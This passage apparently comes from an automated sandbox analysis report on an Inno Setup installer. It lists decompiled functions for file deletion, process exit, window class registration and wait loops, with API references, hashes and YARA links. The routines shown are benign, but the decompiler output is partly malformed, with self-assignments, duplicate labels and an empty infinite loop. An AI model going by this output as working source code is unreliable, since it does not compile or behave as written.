                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                            • API String ID: 1334710084-222967699
                                                            • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                            • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                            • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                            • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E00423A20(void* __eax) {
				signed char _t10;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t17;
				WCHAR* _t18;

				_t17 = __eax;
				_t18 = E0040B278(__eax);
				DeleteFileW(_t18); // executed
				asm("sbb ebx, ebx");
				_t15 = _t14 + 1;
				if(_t15 == 0) {
					_t16 = GetLastError();
					_t10 = GetFileAttributesW(_t18); // executed
					if(_t10 == 0xffffffff || (_t10 & 0x00000004) == 0 || (_t10 & 0x00000010) == 0) {
						SetLastError(_t16);
					} else {
						RemoveDirectoryW(E0040B278(_t17));
						asm("sbb ebx, ebx");
						_t15 = _t15 + 1;
					}
				}
				return _t15;
			}









                                                            0x00423a24
                                                            0x00423a2d
                                                            0x00423a30
                                                            0x00423a38
                                                            0x00423a3a
                                                            0x00423a3d
                                                            0x00423a44
                                                            0x00423a47
                                                            0x00423a4f
                                                            0x00423a70
                                                            0x00423a5a
                                                            0x00423a62
                                                            0x00423a6a
                                                            0x00423a6c
                                                            0x00423a6c
                                                            0x00423a4f
                                                            0x00423a7b

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                            • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 2814369299-0
                                                            • Opcode ID: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
                                                            • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                            • Opcode Fuzzy Hash: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
                                                            • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00409EF8() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x6c5004 != 0) {
					E00409DD8();
					E00409E60(_t46);
					 *0x6c5004 = 0;
				}
				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
					E00409B30(0x6d1bcc);
					E00409E34(0x6d1bcc);
				}
				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
					L8:
					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
						 *0x006D1BA8 = 0;
					}
					if( *((char*)(0x6d1bc4)) != 0) {
						L14:
						E00409B58(); // executed
						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
							_t15 =  *0x006D1BAC;
							if( *0x006D1BAC != 0) {
								E0040EBB8(_t15);
								_t31 =  *((intOrPtr*)(0x6d1bac));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00409B30(0x6d1b9c);
						if( *((char*)(0x6d1bc4)) == 1) {
							 *0x006D1BC0();
						}
						if( *((char*)(0x6d1bc4)) != 0) {
							E00409E34(0x6d1b9c);
						}
						if( *0x6d1b9c == 0) {
							if( *0x6cf038 != 0) {
								 *0x6cf038();
							}
							ExitProcess( *0x6c5000); // executed
						}
						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x6c5000 = 0x6c5000;
						0x6d1b9c = 0x6d1b9c;
						goto L8;
					} else {
						_t20 = E00406FD0();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00408444(_t44);
							_t23 = E00406FD0();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x6cf058; // 0x0
						 *0x6cf058 = 0;
						 *_t33();
					} while ( *0x6cf058 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                            0x00409f0c
                                                            0x00409f0e
                                                            0x00409f13
                                                            0x00409f1a
                                                            0x00409f1a
                                                            0x00409f26
                                                            0x00409f3a
                                                            0x00409f44
                                                            0x00409f44
                                                            0x00409f4d
                                                            0x00409f71
                                                            0x00409f75
                                                            0x00409f7e
                                                            0x00409f7e
                                                            0x00409f85
                                                            0x00409fa4
                                                            0x00409fa4
                                                            0x00409fad
                                                            0x00409fb4
                                                            0x00409fb9
                                                            0x00409fbb
                                                            0x00409fc0
                                                            0x00409fc3
                                                            0x00409fc3
                                                            0x00409fc6
                                                            0x00409fc9
                                                            0x00409fd0
                                                            0x00409fd0
                                                            0x00409fc9
                                                            0x00409fb9
                                                            0x00409fd7
                                                            0x00409fe0
                                                            0x00409fe2
                                                            0x00409fe2
                                                            0x00409fe9
                                                            0x00409fed
                                                            0x00409fed
                                                            0x00409ff5
                                                            0x00409ffe
                                                            0x0040a000
                                                            0x0040a000
                                                            0x0040a009
                                                            0x0040a009
                                                            0x0040a01b
                                                            0x0040a01b
                                                            0x0040a01d
                                                            0x0040a01e
                                                            0x00000000
                                                            0x00409f87
                                                            0x00409f87
                                                            0x00409f8c
                                                            0x00409f90
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00409f92
                                                            0x00409f92
                                                            0x00409f94
                                                            0x00409f99
                                                            0x00409f9e
                                                            0x00409fa0
                                                            0x00000000
                                                            0x00409f92
                                                            0x00409f58
                                                            0x00409f58
                                                            0x00409f58
                                                            0x00409f61
                                                            0x00409f66
                                                            0x00409f68
                                                            0x00000000
                                                            0x00409f71
                                                            0x00000000
                                                            0x00409f71

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction ID: e2cc099636b1ff89dc3d2fe7d8b391202ea9480b4d839bd65efd70e323d436a8
                                                            • Opcode Fuzzy Hash: 19759392ed06106502a1c1b2e6486d6f2820d04f59653749a07cc7070f676968
                                                            • Instruction Fuzzy Hash: 60316F20B006429AD720AB7A9484B2777E66B44328F14053FE449E62E3D7BCDCC4C75D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409EF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E00409EF0() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x6c5004 != 0) {
					E00409DD8();
					E00409E60(_t50);
					 *0x6c5004 = 0;
				}
				if( *0x6d1bd0 != 0 && GetCurrentThreadId() ==  *0x6d1bf8) {
					E00409B30(0x6d1bcc);
					E00409E34(0x6d1bcc);
				}
				if( *0x006D1BC4 != 0 ||  *0x6cf058 == 0) {
					L9:
					if( *((char*)(0x6d1bc4)) == 2 &&  *0x6c5000 == 0) {
						 *0x006D1BA8 = 0;
					}
					if( *((char*)(0x6d1bc4)) != 0) {
						L15:
						E00409B58(); // executed
						if( *((char*)(0x6d1bc4)) <= 1 ||  *0x6c5000 != 0) {
							_t18 =  *0x006D1BAC;
							if( *0x006D1BAC != 0) {
								E0040EBB8(_t18);
								_t34 =  *((intOrPtr*)(0x6d1bac));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00409B30(0x6d1b9c);
						if( *((char*)(0x6d1bc4)) == 1) {
							 *0x006D1BC0();
						}
						if( *((char*)(0x6d1bc4)) != 0) {
							E00409E34(0x6d1b9c);
						}
						if( *0x6d1b9c == 0) {
							if( *0x6cf038 != 0) {
								 *0x6cf038();
							}
							ExitProcess( *0x6c5000); // executed
						}
						memcpy(0x6d1b9c,  *0x6d1b9c, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x6c5000 = 0x6c5000;
						0x6d1b9c = 0x6d1b9c;
						goto L9;
					} else {
						_t23 = E00406FD0();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00408444(_t48);
							_t26 = E00406FD0();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x6cf058; // 0x0
						 *0x6cf058 = 0;
						 *_t36();
					} while ( *0x6cf058 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                            0x00409ef2
                                                            0x00409f0c
                                                            0x00409f0e
                                                            0x00409f13
                                                            0x00409f1a
                                                            0x00409f1a
                                                            0x00409f26
                                                            0x00409f3a
                                                            0x00409f44
                                                            0x00409f44
                                                            0x00409f4d
                                                            0x00409f71
                                                            0x00409f75
                                                            0x00409f7e
                                                            0x00409f7e
                                                            0x00409f85
                                                            0x00409fa4
                                                            0x00409fa4
                                                            0x00409fad
                                                            0x00409fb4
                                                            0x00409fb9
                                                            0x00409fbb
                                                            0x00409fc0
                                                            0x00409fc3
                                                            0x00409fc3
                                                            0x00409fc6
                                                            0x00409fc9
                                                            0x00409fd0
                                                            0x00409fd0
                                                            0x00409fc9
                                                            0x00409fb9
                                                            0x00409fd7
                                                            0x00409fe0
                                                            0x00409fe2
                                                            0x00409fe2
                                                            0x00409fe9
                                                            0x00409fed
                                                            0x00409fed
                                                            0x00409ff5
                                                            0x00409ffe
                                                            0x0040a000
                                                            0x0040a000
                                                            0x0040a009
                                                            0x0040a009
                                                            0x0040a01b
                                                            0x0040a01b
                                                            0x0040a01d
                                                            0x0040a01e
                                                            0x00000000
                                                            0x00409f87
                                                            0x00409f87
                                                            0x00409f8c
                                                            0x00409f90
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00409f92
                                                            0x00409f92
                                                            0x00409f94
                                                            0x00409f99
                                                            0x00409f9e
                                                            0x00409fa0
                                                            0x00000000
                                                            0x00409f92
                                                            0x00409f58
                                                            0x00409f58
                                                            0x00409f58
                                                            0x00409f61
                                                            0x00409f66
                                                            0x00409f68
                                                            0x00000000
                                                            0x00409f71
                                                            0x00000000
                                                            0x00409f71

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00409F28
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                              • Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                              • Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction ID: 07d30fd0877b4d42c88f7c1dd8669400ca79996a2773cdc214a63d44a36a60ff
                                                            • Opcode Fuzzy Hash: 86ca27ab4cbfe576b0a3ee541a0fe11273007b0e3819c982b8d9582f61fa1f39
                                                            • Instruction Fuzzy Hash: C4316E20A007828ADB21AB769494B2777E26F15318F14487FE049E62E3D7BCDCC4C71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004785F8, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E004785F8(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSW _v44;
				WCHAR* _t8;
				int _t10;
				void* _t11;
				struct HWND__* _t15;
				long _t17;
				WCHAR* _t20;
				struct HWND__* _t22;
				WCHAR* _t24;

				 *0x6c7aa8 =  *0x6d2634;
				_t8 =  *0x6c7abc; // 0x4785dc
				_t10 = GetClassInfoW( *0x6d2634, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00414778 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t20 =  *0x6c7abc; // 0x4785dc
						UnregisterClassW(_t20,  *0x6d2634);
					}
					RegisterClassW(0x6c7a98);
				}
				_t24 =  *0x6c7abc; // 0x4785dc
				_t15 = E00414DA0(0x80, _t24, 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					_t17 = E0047845C(_a4, _a8); // executed
					SetWindowLongW(_t22, 0xfffffffc, _t17);
				}
				return _t22;
			}












                                                            0x00478604
                                                            0x0047860d
                                                            0x00478619
                                                            0x00478621
                                                            0x00478623
                                                            0x00478626
                                                            0x00478634
                                                            0x0047863c
                                                            0x00478642
                                                            0x00478642
                                                            0x0047864c
                                                            0x0047864c
                                                            0x0047866f
                                                            0x0047867a
                                                            0x0047867f
                                                            0x00478686
                                                            0x0047868e
                                                            0x00478697
                                                            0x00478697
                                                            0x004786a2

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                            • String ID:
                                                            • API String ID: 4025006896-0
                                                            • Opcode ID: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
                                                            • Instruction ID: 194e1b82028893281538589df9a22bcce55ada3cdaffe31495447ecbac098301
                                                            • Opcode Fuzzy Hash: c13718059519df6099dbd22287901c2cd341ee5024df696f59e832b4f8273898
                                                            • Instruction Fuzzy Hash: D501C4716452057BCB10EB98EC85FDF739EE758314F10811AF508E7391CA39E9418BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060EFD8, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForInputIdle.USER32 ref: 0060F004
                                                            • MsgWaitForMultipleObjects.USER32 ref: 0060F026
                                                            • GetExitCodeProcess.KERNEL32 ref: 0060F037
                                                            • CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                            • String ID:
                                                            • API String ID: 4071923889-0
                                                            • Opcode ID: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
                                                            • Instruction ID: 3bf9388a4eab4805cc6f518967bcd8e0b9f61bd1b59095cebcc575be48bbaf87
                                                            • Opcode Fuzzy Hash: b2c0e9a815401a59890ae953dc8cc514a32d7d884ad163320893ed3959533c1a
                                                            • Instruction Fuzzy Hash: 24012D70A80308BEEB3497A58D16FEBBBADDF45760F510536F604C36C2D5759D40C664
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ACABC, Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E006ACABC(signed char __eax, void* __ecx, void* __edx, void* __eflags) {
				long _t7;
				void* _t9;
				void* _t14;
				void* _t15;
				signed char* _t16;

				_t17 = __eflags;
				_push(__ecx);
				_t14 = __ecx;
				_t15 = __edx;
				 *_t16 = __eax;
				while(1) {
					E0060C158( *_t16 & 0x000000ff, _t15, _t17); // executed
					asm("sbb ebx, ebx");
					_t9 = _t9 + 1;
					if(_t9 != 0 || GetLastError() == 2 || GetLastError() == 3) {
						break;
					}
					_t7 = GetTickCount();
					_t17 = _t7 - _t14 - 0x7d0;
					if(_t7 - _t14 < 0x7d0) {
						Sleep(0x32);
						continue;
					}
					break;
				}
				return _t9;
			}








                                                            0x006acabc
                                                            0x006acabf
                                                            0x006acac0
                                                            0x006acac2
                                                            0x006acac4
                                                            0x006acac7
                                                            0x006acacd
                                                            0x006acad5
                                                            0x006acad7
                                                            0x006acada
                                                            0x00000000
                                                            0x00000000
                                                            0x006acaf0
                                                            0x006acaf7
                                                            0x006acafc
                                                            0x006acb00
                                                            0x00000000
                                                            0x006acb00
                                                            0x00000000
                                                            0x006acafc
                                                            0x006acb0d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$CountSleepTick
                                                            • String ID:
                                                            • API String ID: 2227064392-0
                                                            • Opcode ID: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
                                                            • Instruction ID: 650aecd8dda8324acb9ef1ef12543e615cdaddf0aa48ac4ca6bdf88ba774c7be
                                                            • Opcode Fuzzy Hash: 66301a0a26332de94f541b13cc40e963d91ad8f3bd11375468a19028b1306bfa
                                                            • Instruction Fuzzy Hash: 2AE02B7234838094D725356E58864BE8D5ACFC3376F280A3FF0C4D2182C4058D85C576
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AE3C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E006AE3C8(long __eax, void* __ecx, void* __fp0) {
				void* __ebx;
				void* __ebp;
				long _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr* _t69;
				struct HWND__* _t72;
				int _t73;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t93;
				void* _t94;
				void* _t95;
				intOrPtr _t98;
				void* _t100;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				long _t126;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t147;

